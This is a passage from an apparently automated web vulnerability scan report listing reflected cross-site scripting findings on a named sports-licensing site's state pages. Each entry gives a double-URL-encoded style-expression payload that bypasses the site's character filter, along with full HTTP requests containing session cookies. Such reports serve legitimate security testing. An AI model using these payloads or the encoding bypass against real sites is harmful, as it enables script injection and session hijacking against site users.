Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:52:42 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 17:52:31 GMT
NS_RTIMER_COMPOSITE: 1222459890:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=934
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 110378


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Oklahoma</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</script>
<
...[SNIP]...
turnerlicensing.com/s.nl?sc=77&category=175670&f9598%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527673ea07282e=1&f9598%27style%3d%27x%3aexpression%28alert%281%29%29%27673ea07282e=1&f9598'style='x:expression(alert(1))'673ea07282e=1&fromsla=T'>
...[SNIP]...

1.116. http://www.turnerlicensing.com/teams_by_state/Oregon [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /teams_by_state/Oregon

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 3239c%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25270a7c4969562 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 3239c'style='x:expression(alert(1))'0a7c4969562 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /teams_by_state/Oregon?3239c%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25270a7c4969562=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:52:38 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 17:52:31 GMT
NS_RTIMER_COMPOSITE: -1146975289:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=983
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 110334


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Oregon</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</script>
<sc
...[SNIP]...
<input type='hidden' name='referer' value='http://www.turnerlicensing.com/s.nl?sc=77&category=175671&3239c%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25270a7c4969562=1&3239c'style='x:expression(alert(1))'0a7c4969562=1&3239c%27style%3d%27x%3aexpression%28alert%281%29%29%270a7c4969562=1&fromsla=T'>
...[SNIP]...

1.117. http://www.turnerlicensing.com/teams_by_state/Ottawa [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /teams_by_state/Ottawa

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 885e7%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527749e6052f63 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 885e7'style='x:expression(alert(1))'749e6052f63 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /teams_by_state/Ottawa?885e7%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527749e6052f63=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:52:36 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 17:52:31 GMT
NS_RTIMER_COMPOSITE: 772666346:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=928
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 87508


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Ottawa</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</script>
<sc
...[SNIP]...
turnerlicensing.com/s.nl?sc=77&category=260194&885e7%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527749e6052f63=1&885e7%27style%3d%27x%3aexpression%28alert%281%29%29%27749e6052f63=1&885e7'style='x:expression(alert(1))'749e6052f63=1&fromsla=T'>
...[SNIP]...

1.118. http://www.turnerlicensing.com/teams_by_state/Pennsylvania [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /teams_by_state/Pennsylvania

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload ffcbc%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527ef6395e1920 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ffcbc'style='x:expression(alert(1))'ef6395e1920 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /teams_by_state/Pennsylvania?ffcbc%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527ef6395e1920=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:52:39 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 17:52:31 GMT
NS_RTIMER_COMPOSITE: 328766236:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=912
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 111623


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Pennsylvania</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</scrip
...[SNIP]...
<input type='hidden' name='referer' value='http://www.turnerlicensing.com/s.nl?sc=77&category=175672&ffcbc%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527ef6395e1920=1&ffcbc'style='x:expression(alert(1))'ef6395e1920=1&ffcbc%27style%3d%27x%3aexpression%28alert%281%29%29%27ef6395e1920=1&fromsla=T'>
...[SNIP]...

1.119. http://www.turnerlicensing.com/teams_by_state/Rhode-Island [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /teams_by_state/Rhode-Island

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload a84dc%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252717befc6fc54 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a84dc'style='x:expression(alert(1))'17befc6fc54 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /teams_by_state/Rhode-Island?a84dc%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252717befc6fc54=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:52:30 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 17:52:31 GMT
NS_RTIMER_COMPOSITE: -1590878181:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=997
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 60061


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Rhode Island</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</scrip
...[SNIP]...
nsing.com/s.nl?sc=77&category=175740&a84dc%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252717befc6fc54=1&a84dc%27style%3d%27x%3aexpression%28alert%281%29%29%2717befc6fc54=1&fromsla=T&a84dc'style='x:expression(alert(1))'17befc6fc54=1'>
...[SNIP]...

1.120. http://www.turnerlicensing.com/teams_by_state/South-Carolina [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /teams_by_state/South-Carolina

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 62e79%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527dc0d0d2a4ae was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 62e79'style='x:expression(alert(1))'dc0d0d2a4ae in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /teams_by_state/South-Carolina?62e79%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527dc0d0d2a4ae=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:52:40 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 17:52:31 GMT
NS_RTIMER_COMPOSITE: -259173507:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=890
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 110580


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>South Carolina</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</scr
...[SNIP]...
turnerlicensing.com/s.nl?sc=77&category=175742&62e79%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527dc0d0d2a4ae=1&62e79%27style%3d%27x%3aexpression%28alert%281%29%29%27dc0d0d2a4ae=1&62e79'style='x:expression(alert(1))'dc0d0d2a4ae=1&fromsla=T'>
...[SNIP]...

1.121. http://www.turnerlicensing.com/teams_by_state/South-Dakota [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /teams_by_state/South-Dakota

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 29abe%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527456eef5a39 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 29abe'style='x:expression(alert(1))'456eef5a39 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /teams_by_state/South-Dakota?29abe%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527456eef5a39=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:52:29 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 17:52:22 GMT
NS_RTIMER_COMPOSITE: -259176447:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=966
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 54518


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>South Dakota</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</scrip
...[SNIP]...
censing.com/s.nl?sc=77&category=175745&29abe%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527456eef5a39=1&29abe%27style%3d%27x%3aexpression%28alert%281%29%29%27456eef5a39=1&fromsla=T&29abe'style='x:expression(alert(1))'456eef5a39=1'>
...[SNIP]...

1.122. http://www.turnerlicensing.com/teams_by_state/Tennessee [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /teams_by_state/Tennessee

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload a95b2%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527349b7eab0ec was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a95b2'style='x:expression(alert(1))'349b7eab0ec in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /teams_by_state/Tennessee?a95b2%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527349b7eab0ec=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:52:42 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 17:52:31 GMT
NS_RTIMER_COMPOSITE: -109242345:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=812
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 110772


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Tennessee</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</script>

...[SNIP]...
<input type='hidden' name='referer' value='http://www.turnerlicensing.com/s.nl?sc=77&category=175746&a95b2%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527349b7eab0ec=1&a95b2'style='x:expression(alert(1))'349b7eab0ec=1&a95b2%27style%3d%27x%3aexpression%28alert%281%29%29%27349b7eab0ec=1&fromsla=T'>
...[SNIP]...

1.123. http://www.turnerlicensing.com/teams_by_state/Texas [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /teams_by_state/Texas

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 4e897%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527fd511f150a8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4e897'style='x:expression(alert(1))'fd511f150a8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /teams_by_state/Texas?4e897%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527fd511f150a8=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:52:45 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 17:52:31 GMT
NS_RTIMER_COMPOSITE: 328767861:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=945
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 111340


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Texas</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</script>
<scr
...[SNIP]...
<input type='hidden' name='referer' value='http://www.turnerlicensing.com/s.nl?sc=77&category=175748&4e897%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527fd511f150a8=1&4e897'style='x:expression(alert(1))'fd511f150a8=1&4e897%27style%3d%27x%3aexpression%28alert%281%29%29%27fd511f150a8=1&fromsla=T'>
...[SNIP]...

1.124. http://www.turnerlicensing.com/teams_by_state/Toronto [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /teams_by_state/Toronto

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload f3d65%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252787f866157d7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f3d65'style='x:expression(alert(1))'87f866157d7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /teams_by_state/Toronto?f3d65%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252787f866157d7=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:52:49 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 17:52:31 GMT
NS_RTIMER_COMPOSITE: 226405503:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=903
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 110176


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Toronto</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</script>
<s
...[SNIP]...
<input type='hidden' name='referer' value='http://www.turnerlicensing.com/s.nl?sc=77&category=175762&f3d65%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252787f866157d7=1&f3d65'style='x:expression(alert(1))'87f866157d7=1&f3d65%27style%3d%27x%3aexpression%28alert%281%29%29%2787f866157d7=1&fromsla=T'>
...[SNIP]...

1.125. http://www.turnerlicensing.com/teams_by_state/Utah [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /teams_by_state/Utah

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload d76ae%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25279da4365e664 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d76ae'style='x:expression(alert(1))'9da4365e664 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

